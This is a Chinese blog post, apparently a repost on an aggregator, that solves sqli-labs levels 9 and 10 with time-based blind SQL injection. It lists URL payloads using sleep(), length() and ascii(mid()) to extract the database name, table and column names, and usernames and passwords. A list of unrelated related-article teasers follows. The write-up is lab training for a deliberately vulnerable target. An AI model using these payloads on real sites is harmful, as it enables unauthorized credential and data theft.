SQL注入sqli_labs靶场第九、十题

SQL注入sqli_labs靶场第九、十题

news/2025/4/27 12:48:55/文章来源:https://blog.csdn.net/2301_79355407/article/details/137653376

第九题

?id=1 and 1=1 页面正常

?id=1 and 1=2 页面正常

?id=1' and '1'='1 页面正常

?id=1' and '1'='2 页面正常

输入任何信息，均显示相同页面，尝试延时注入判断

?id=1 and if(1=1,sleep(5),1)--+ 页面迅速显示

?id=1' and if(1=1,sleep(5),1)--+ 页面过了5秒显示

判断为单引号注入

延时注入：

判断数据库名字长度

?id=1' and if(length(database())=8,sleep(3),1)--+

逐一猜解数据库名字（用二分法 ascii码不断缩小范围）

?id=1' and if(ascii(mid((select database()),1,1))=115,sleep(3),1)--+

判断所有表名长度

?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(3),1)--+

逐一猜解表名

?id=1' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>64,sleep(3),1)--+

判断所有字段名的长度

?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(3),1)--+

逐一猜解字段名

?id=1'and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>100,sleep(3),1)--+

判断字段内容长度

?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(3),1)--+

逐一检测内容

?id=1' and if(ascii(mid((select group_concat(username,password) from users),1,1))>50,sleep(3),1)--+

第十题

和第九题情况相同，无论输入什么，回显内容均相同

进行延时注入判断

?id=1 and if(1=1,sleep(5),1)--+ 页面迅速显示

?id=1" and if(1=1,sleep(5),1)--+ 页面过了5秒显示

判断为双引号注入

剩余步骤与第九题相同

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/809196.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

http请求头导致了dial tcp:lookup xxxx on 10.43.0.10:53 no sunch host

http请求头导致了dial tcp:lookup xxxx on 10.43.0.10:53 no sunch host

事实证明人有的时候也不能太偷懒，太偷懒容易给自己埋坑。问题的背景： web端调用服务A，服务A异步调用服务B。服务A有四个场景需要调用服务B，所以，服务A中封装了一个公用的方法，唯一的区别是，场…

阅读更多...

IDEA 控制台中文乱码 4 种解决方案

IDEA 控制台中文乱码 4 种解决方案

前言 IntelliJ IDEA 如果不进行相关设置，可能会导致控制台中文乱码、配置文件中文乱码等问题，非常影响编码过程中进行问题追踪。本文总结了 IDEA 中常见的中文乱码解决方法，希望能够帮助到大家。 IDEA 中文乱码解决方案一、设置字体为支…

阅读更多...

手机银行客户端框架之mPaaS介绍

手机银行客户端框架之mPaaS介绍

移动开发平台（Mobile PaaS，简称 mPaaS）是源于支付宝 App 的移动开发平台，为移动开发、测试、运营及运维提供云到端的一站式解决方案，能有效降低技术门槛、减少研发成本、提升开发效率，协助企业快速搭建稳定…

阅读更多...

H. GCD is Greater

H. GCD is Greater

H. GCD is Greater 题意给定一个长度为 n n n的数组 a a a，先手选择 [ 2 , n − 2 ] [2,n-2] [2,n−2]个数并计算所选择数的gcd，后手选择剩下的数，并计算剩下所有的数按位与的结果，再加上给定的 x x x，如果先手的结果…

阅读更多...

Docker Redis Debian服务器版

Docker Redis Debian服务器版

1.使用官方安装脚本自动安装docker 安装命令如下： curl -fsSL https://get.docker.com -o get-docker.shsudo sh get-docker.sh 如果安装提示 -bash sudo command not found 则需要 #update sudo apt-get update sudo apt-get install sudo再执行安装脚本1 安装…

阅读更多...

c++中常用库函数

c++中常用库函数

大小写转换 islower/isupper函数 char ch1 A; char ch2 b;//使用islower函数判断字符是否为小写字母 if(islower(ch1)){cout << ch1 << "is a lowercase letter." << end1; } else{cout << ch1 << "is not a lowercase lette…

阅读更多...

上采样-Lanczos插值

上采样-Lanczos插值

Lanczos插值是一种高级的上采样方法，它在计算目标图像中每个像素的值时，利用了周围像素的信息，并通过Lanczos滤波器进行插值计算，以产生较为清晰的结果。下面通过图文并茂的方式详细描述Lanczos插值方法的实现过程。现在我们想将…

阅读更多...

IntelliJ IDEA（WebStorm、PyCharm、DataGrip等）设置中英文等宽字体，英文为中文的一半（包括标点符号）

IntelliJ IDEA（WebStorm、PyCharm、DataGrip等）设置中英文等宽字体，英文为中文的一半（包括标点符号）

1.设置前（idea默认字体为 JetBrains Mono） 2.设置后（楷体）

阅读更多...

计算机网络常见面试总结

计算机网络常见面试总结

文章目录 1. 计算机网络基础1.1 网络分层模型1. OSI 七层模型是什么？每一层的作用是什么？2.TCP/IP 四层模型是什么？每一层的作用是什么？3. 为什么网络要分层？ 1.2 常见网络协议1. 应用层有哪些常见的协议？2…

阅读更多...

三种语言实现spark createDataFrame

三种语言实现spark createDataFrame

前言我们经常需要在本地用数组写一些测试数据，进行spark逻辑测试，需要借助StructType和StructField以及数组生成DataFrame，最终进行测试，这里就简单的用Java、Scala、Python三种语言实现用数组的数据创建DataFrame。了解StructType和StructField StructType spark stru…

阅读更多...

systemctl start docker报错(code=exited, status=1/FAILURE)

systemctl start docker报错(code=exited, status=1/FAILURE)

运行systemctl start docker报错内容如下: 输入systemctl status docker.service显示以下内容： 本次启动不起来与docker服务无关具体解决问题是修改 /etc/docker/daemon.json，vim /etc/docker/daemon.json # 添加如下内容 {"registry-mirrors&qu…

阅读更多...

ccf201509-3模板生成系统(list，map，字符串综合运用)

ccf201509-3模板生成系统(list，map，字符串综合运用)

问题描述成成最近在搭建一个网站，其中一些页面的部分内容来自数据库中不同的数据记录，但是页面的基本结构是相同的。例如，对于展示用户信息的页面，当用户为 Tom 时，网页的源代码是： 而当用户为 Jerry 时…

阅读更多...

华为OD-C卷-分披萨[100分]

华为OD-C卷-分披萨[100分]

题目描述 "吃货"和"馋嘴"两人到披萨店点了一份铁盘（圆形）披萨，并嘱咐店员将披萨按放射状切成大小相同的偶数个小块。但是粗心的服务员将披萨切成了每块大小都完全不同奇数块，且肉眼能分辨出大小。由于两人都想吃到最多的披萨，他们商量了一个他们认…

阅读更多...

使用htmlentities()和nl2br()将文本数据正确显示到前台

使用htmlentities()和nl2br()将文本数据正确显示到前台

问题： 在后台textarea里编辑了有一串字符串，虽然在textarea里编辑是有换行效果的，但是数据获取到就只是\n，前端是不认识这个的，正确输出到前台的换行只能是<br/>。 $str "ABCDEFGHIJKLMNOPQ"; echo…

阅读更多...

网络安全之反弹Shell

网络安全之反弹Shell

网络安全之反弹Shell 在网络安全和渗透测试领域，“正向Shell”（Forward Shell）和"反向Shell"（Reverse Shell）是两种常用的技术手段，用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者…

阅读更多...

Golang | Leetcode Golang题解之第22题括号生成

Golang | Leetcode Golang题解之第22题括号生成

题目： 题解： var res []stringfunc generateParenthesis(n int) []string {res make([]string, 0)dfs(n, 0, 0, "")return res }func dfs(n int, lc int, rc int, path string) {if lc n && rc n {res append(res, path)return }…

阅读更多...

2024-Java-Maven学习笔记

2024-Java-Maven学习笔记

Maven Maven是一个Java项目管理和构建工具，作用：定义（规范）项目结构、项目依赖、使用统一的方式自动化构建（clean、compile）。提供了一套依赖管理机制：利用仓库统一管理jar包，利用…

阅读更多...

阿里云（国内）安装nvm

阿里云（国内）安装nvm

更多文章，访问：阿里云（国内）安装nvm – 夜空中最亮的星直接使用nvm脚本安装的时候一直失败，应该是国内网络的问题，使用下面方案进行解决： 下载 cd / wget https://github.com/nvm-sh/nvm/arch…

阅读更多...

机器学习-09-图像处理01-理论

机器学习-09-图像处理01-理论

总结本系列是机器学习课程的系列课程，主要介绍机器学习中图像处理技术。参考 02图像知识色彩基础知识整理-色相、饱和度、明度、色调图像特征提取（VGG和Resnet特征提取卷积过程详解） Python图像处理入门【人工智能】PythonOpenCV…

阅读更多...

线程池-线程池分类

线程池-线程池分类

线程池分类 FixedThreadPool：固定大小线程池，线程数量固定，不会自动扩容或缩容。 CachedThreadPool：缓存线程池，线程数量不固定，根据需要自动扩容或缩容。适用于执行大量短时间任务的场景。 SingleThrea…

阅读更多...

最新文章